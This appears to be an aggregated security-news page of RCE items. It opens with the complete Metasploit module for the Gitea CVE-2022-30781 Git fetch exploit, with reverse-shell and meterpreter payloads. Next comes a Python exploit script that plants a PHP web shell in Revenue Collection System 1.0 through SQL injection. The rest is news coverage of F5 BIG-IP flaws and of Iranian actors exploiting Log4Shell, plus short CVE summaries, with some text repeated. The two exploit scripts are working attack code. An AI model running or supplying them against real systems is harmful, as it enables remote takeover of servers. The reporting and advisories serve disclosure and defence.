This Metasploit module exploits the Git fetch command in the Gitea repository migration process to allow for remote command execution on the system. This vulnerability affect Gitea versions prior to 1.16.7.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::HTTP::Gitea  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gitea Git Fetch Remote Code Execution',        'Description' => %q{          This module exploits Git fetch command in Gitea repository migration          process that leads to a remote command execution on the system.          This vulnerability affect Gitea before 1.16.7 version.        },        'Author' => [          'wuhan005', # Original PoC          'li4n0', # Original PoC          'krastanoel' # MSF Module        ],        'References' => [          ['CVE', '2022-30781'],          ['URL', 'https://tttang.com/archive/1607/']        ],        'DisclosureDate' => '2022-05-16',        'License' => MSF_LICENSE,        'Platform' => %w[unix linux win],        'Arch' => ARCH_CMD,        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => %i[curl wget echo printf],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',                'CMDSTAGER::URIPATH' => '/payloads'              }            }          ]        ],        'DefaultOptions' => { 'WfsDelay' => 30 },        'DefaultTarget' => 1,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options([      Opt::RPORT(3000),      OptString.new('USERNAME', [true, 'Username to authenticate with']),      OptString.new('PASSWORD', [true, 'Password to use']),      OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),    ])  end  def cleanup    super    return if @uid.nil? || @migrate_repo_created.nil?    [@repo_name, @migrate_repo_name].each do |name|      res = gitea_remove_repo(repo_path(name))      if res.nil? || res&.code == 200        vprint_warning("Unable to remove repository '#{name}'")      elsif res&.code == 404        vprint_warning("Repository '#{name}' not found, possibly already deleted")      else        vprint_status("Successfully cleanup repository '#{name}'")      end    end  end  def check    return CheckCode::Safe('USERNAME can\'t be blank') if datastore['username'].blank?    v = get_gitea_version    gitea_login(datastore['username'], datastore['password'])    if Rex::Version.new(v) <= Rex::Version.new('1.16.6')      return CheckCode::Appears("Version detected: #{v}")    end    CheckCode::Safe("Version detected: #{v}")  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError => e    return CheckCode::Unknown(e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError => e    return CheckCode::Detected(e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError,         Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e    return CheckCode::Safe(e.message)  end  def primer    [      '/api/v1/version', '/api/v1/settings/api',      "/api/v1/repos/#{@migrate_repo_path}",      "/api/v1/repos/#{@migrate_repo_path}/pulls",      "/api/v1/repos/#{@migrate_repo_path}/topics"    ].each { |uri| hardcoded_uripath(uri) } # adding resources  end  def execute_command(cmd, _opts = {})    if target['Type'] == :win_dropper      # Git on Windows will pass the command to `sh.exe` and not `cmd`.      # This requires some adjustments:      # - Windows environment variables are mapped by `sh.exe`: `%VAR%` becomes `$VAR`      # - `cmd` uses `&` to join multiple commands, whereas `sh.exe` uses `&&`.      # - Backslashes need to be escaped with `sh.exe`      cmd = cmd.gsub(/%(\w+)%/) { "$#{::Regexp.last_match(1)}" }.gsub(/&/) { '&&' }.gsub(/\\/) { '\\\\\\' }    end    vprint_status("Executing command: #{cmd}")    @repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_name = rand_text_alphanumeric(6..15)    @migrate_repo_path = repo_path(@migrate_repo_name)    vprint_status("Creating repository \"#{@repo_name}\"")    @uid = gitea_create_repo(@repo_name)    vprint_good('Repository created')    vprint_status('Migrating repository')    clone_url = "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}"    auth_token = rand_text_alphanumeric(6..15)    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)    @p = cmd  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError,         Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError,         Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e    fail_with(Failure::UnexpectedReply, e.message)  end  def exploit    unless datastore['AutoCheck']      fail_with(Failure::BadConfig, 'USERNAME can\'t be blank') if datastore['username'].blank?      gitea_login(datastore['username'], datastore['password'])    end    start_service    primer    case target['Type']    when :unix_cmd, :win_cmd      execute_command(payload.encoded)    when :linux_dropper, :win_dropper      datastore['CMDSTAGER::URIPATH'] = "/#{rand_text_alphanumeric(6..15)}"      execute_cmdstager(background: true, delay: 1)    end  rescue Timeout::Error => e    fail_with(Failure::TimeoutExpired, e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError => e    fail_with(Failure::UnexpectedReply, e.message)  rescue Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError => e    fail_with(Failure::NoAccess, e.message)  end  def repo_path(name)    "#{datastore['username']}/#{name}"  end  def on_request_uri(cli, req)    case req.uri    when '/api/v1/version'      send_response(cli, '{"version": "1.16.6"}')    when '/api/v1/settings/api'      data = {        max_response_items: 50, default_paging_num: 30,        default_git_trees_per_page: 1000, default_max_blob_size: 10485760      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}"      data = {        clone_url: "#{full_uri}#{datastore['username']}/#{@repo_name}",        owner: { login: datastore['username'] }      }      send_response(cli, data.to_json)    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"      send_response(cli, '{"topics":[]}')    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"      data = [        {          base: {            ref: 'master'          },          head: {            ref: "--upload-pack=#{@p}",            repo: {              clone_url: './',              owner: { login: 'master' }            }          },          updated_at: '2001-01-01T05:00:00+01:00',          user: {}        }      ]      send_response(cli, data.to_json)    when datastore['CMDSTAGER::URIPATH']      super    end  endend

Gitea Git Fetch Remote Code Execution

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems.
Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints.
The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems.

Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints.

The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

*   **CVE-2022-41622** (CVSS score: 8.8) - A cross-site request forgery (CSRF) vulnerability through iControl SOAP, leading to unauthenticated remote code execution.
*   **CVE-2022-41800** (CVSS score: 8.7) - An iControl REST vulnerability that could allow an authenticated user with an Administrator role to bypass Appliance mode restrictions.

"By successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing)," Rapid7 researcher Ron Bowes said.

However, it's worth noting that such an exploit requires an administrator with an active session to visit a hostile website.

Also identified were three different instances of security bypass, which F5 said cannot be exploited without first breaking existing security barriers through a previously undocumented mechanism.

Should such a scenario arise, an adversary with Advanced Shell (bash) access to the appliance could weaponize these weaknesses to execute arbitrary system commands, create or delete files, or disable services.

While F5 has made no mention of any of the vulnerabilities being exploited in attacks, it's recommended that users apply the necessary patches to mitigate potential risks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Iranian government-sponsored threat actors have been blamed for compromising a U.S. federal agency by taking advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server.
The details, which were shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), come in response to incident response efforts undertaken by the authority from mid-June through mid-July 2022

Iranian government-sponsored threat actors have been blamed for compromising a U.S. federal agency by taking advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server.

The details, which were shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), come in response to incident response efforts undertaken by the authority from mid-June through mid-July 2022.

"Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," CISA noted.

LogShell, aka CVE-2021-44228, is a critical remote code execution flaw in the widely-used Apache Log4j Java-based logging library. It was addressed by the open source project maintainers in December 2021.

The latest development marks the continued abuse of the Log4j vulnerabilities in VMware Horizon servers by Iranian state-sponsored groups since the start of the year. CISA did not attribute the event to a particular hacking group.

However, a joint advisory released by Australia, Canada, the U.K., and the U.S. in September 2022 pointed fingers at Iran's Islamic Revolutionary Guard Corps (IRGC) for leveraging the shortcomings of post-exploitation activities.

The affected organization, per CISA, is believed to have been breached as early as February 2022 by weaponizing the vulnerability to add a new exclusion rule to Windows Defender that allowlisted the entire C:\\ drive.

Doing so made it possible for the adversary to download a PowerShell script without triggering any antivirus scans, which, in turn, retrieved the XMRig cryptocurrency mining software hosted on a remote server in the form of a ZIP archive file.

The initial access further afforded the actors to fetch additional files such as PsExec, Mimikatz, and Ngrok, in addition to using RDP for lateral movement and disabling Windows Defender on the endpoints.

"The threat actors also changed the password for the local administrator account on several hosts as a backup should the rogue domain administrator account get detected and terminated," CISA noted.

Also detected was an unsuccessful attempt at dumping the Local Security Authority Subsystem Service (LSASS) process using the Windows Task Manager, which was blocked by the antivirus solution deployed in the IT environment.

Microsoft, in a report last month, revealed that cybercriminals are targeting credentials in the LSASS process owing to the fact that it "can store not only a current user's OS credentials but also a domain admin's."

"Dumping LSASS credentials is important for attackers because if they successfully dump domain passwords, they can, for example, then use legitimate tools such as PsExec or Windows Management Instrumentation (WMI) to move laterally across the network," the tech giant said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers Compromised a U.S. Federal Agency’s Network Using Log4Shell Exploit

Revenue Collection System version 1.0 suffers from an unauthenticated SQL injection vulnerability in step1.php that allows remote attackers to write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.

    # Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to #   write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.#   This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.#   Ex: python3 rcsv1.py 10.10.14.2 "ls"import sys, requestsdef main():  if len(sys.argv) != 3:    print("(+) usage: %s <target> <cmd>" % sys.argv[0])    print('(+) eg: %s 192.168.121.103 "ls"'  % sys.argv[0])    sys.exit(-1)  targetIP = sys.argv[1]  cmd = sys.argv[2]  s = requests.Session()    # Define obscure filename and command parameter to limit exposure and usage of the RCE.  FILENAME = "youcantfindme.php"  CMDVAR = "ohno"    # Define the SQL injection string  sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)    # Write the PHP file to disk using the SQL injection vulnerability  url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)  r1 = s.get(url1)    # Execute the user defined command and display the result  url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)  r2 = s.get(url2)  print(r2.text)  if __name__ == '__main__':  main()

Revenue Collection System 1.0 SQL Injection / Remote Code Execution

Widespread exploitation deemed ‘unlikely’ given hurdles

Adam Bannister 16 November 2022 at 15:02 UTC  
Updated: 16 November 2022 at 15:06 UTC

Widespread exploitation deemed ‘unlikely’ given hurdles

Security vendor F5 has prepared hotfixes for a pair of vulnerabilities affecting its BIG-IP and BIG-IQ networking devices that could result in remote code execution (RCE).

Software updates containing patches are also in the pipeline for the bugs, which despite potentially severe outcomes have significant barriers to exploitation.

F5 has assigned the most severe of the flaws a ‘high’ severity CVSS score of 8.8, but Rapid7 said this isn’t a “drop everything to fix” situation.

**CSRF to RCE**

The vulnerability (CVE-2022-41622) leaves BIG-IP and BIG-IQ vulnerable to unauthenticated RCE via cross-site request forgery (CSRF) because Big-IP’s SOAP API lacked CSRF protection and other typical SOAP API defenses, according to a blog post published today (November 16) by Ron Bowes, lead security researcher at Rapid7.

The attack “can grant persistent root access to the device’s management interface”, even when this interface is not internet-facing (as is recommended).

However, “that requires a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network)”, said Bowes.

Read more of the latest enterprise security news

If these prerequisites are met, miscreants can make arbitrary SOAP commands against the API within the authenticated user’s session.

Bowes, who uncovered the flaws, said “several of the exploit paths require SELinux bypasses” – which he duly found.

The second issue, tracked as CVE-2022-41800, means iControl REST is vulnerable to RCE via RPM spec injection. However, Bowes considers the risk “low” given iControl REST is only vulnerable in appliance mode and attackers must be authenticated as administrators.

**Exploit chain**

Bowes also uncovered a trio of security control bypasses “that F5 does not consider vulnerabilities” but nevertheless have “a reasonable attack surface” for use as part of an exploit chain.

He said F5 had addressed a SELinux bypass arising through command injection in an update script but declined to assign a CVE.

“We disagree with their assessment because SELinux is a security boundary,” said Bowes.

“We’d normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.”

Bowes also found a SELinux bypass via incorrect file context and a local privilege escalation via inadequate UNIX socket permissions.

RECOMMENDED BIG-IP: Proof-of-concept released for RCE vulnerability in F5 network management tool

F5 told The Daily Swig:  

“As noted by Rapid7, there is no known way to exploit these issues without first bypassing existing security controls using an unknown or undiscovered mechanism. We know of no way in which an attacker would be able to take advantage of these issues at this time and therefore do not consider them vulnerabilities and did not issue CVEs.

“F5 is evaluating these issues as part of a defense-in-depth approach and will look to address them in future releases. We recommend customers adhere to security best practices to reduce any risk should design or threat models change in the future.”

**Hotfixes, patches**

F5 added: “We recommend customers check the security advisories on AskF5 to assess their exposure and get details on recommended mitigations. Engineering hotfixes are available on request for both CVEs, and these fixes will be included in future releases as quickly as possible.” 

At the time of disclosure, F5 is apparently not aware of any active exploitation of the vulnerabilities. Rapid7 believes “widespread exploitation” is “unlikely”.

DON’T MISS Zendesk Explore flaws opened the door to account pillage

F5 fixes high severity RCE bug in BIG-IP, BIG-IQ devices

Heap based buffer overflow in HTTP Server functionality in Micrium uC-HTTP 3.01.01 allows remote code execution via HTTP request.

top.location='https://community.silabs.com/ex/errorduringprocessing.jsp'

CVE-2022-24942

Jenkins SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45396: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins Cluster Statistics Plugin 0.4.6 and earlier allows attackers to delete recorded Jenkins Cluster Statistics.

CVE-2022-45399: Jenkins Security Advisory 2022-11-15

Jenkins Script Security Plugin 1189.vb_a_b_7c8fd5fde and earlier stores whole-script approvals as the SHA-1 hash of the script, making it vulnerable to collision attacks.

CVE-2022-45379: Jenkins Security Advisory 2022-11-15

Jenkins Violations Plugin 0.7.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

Tag

#rce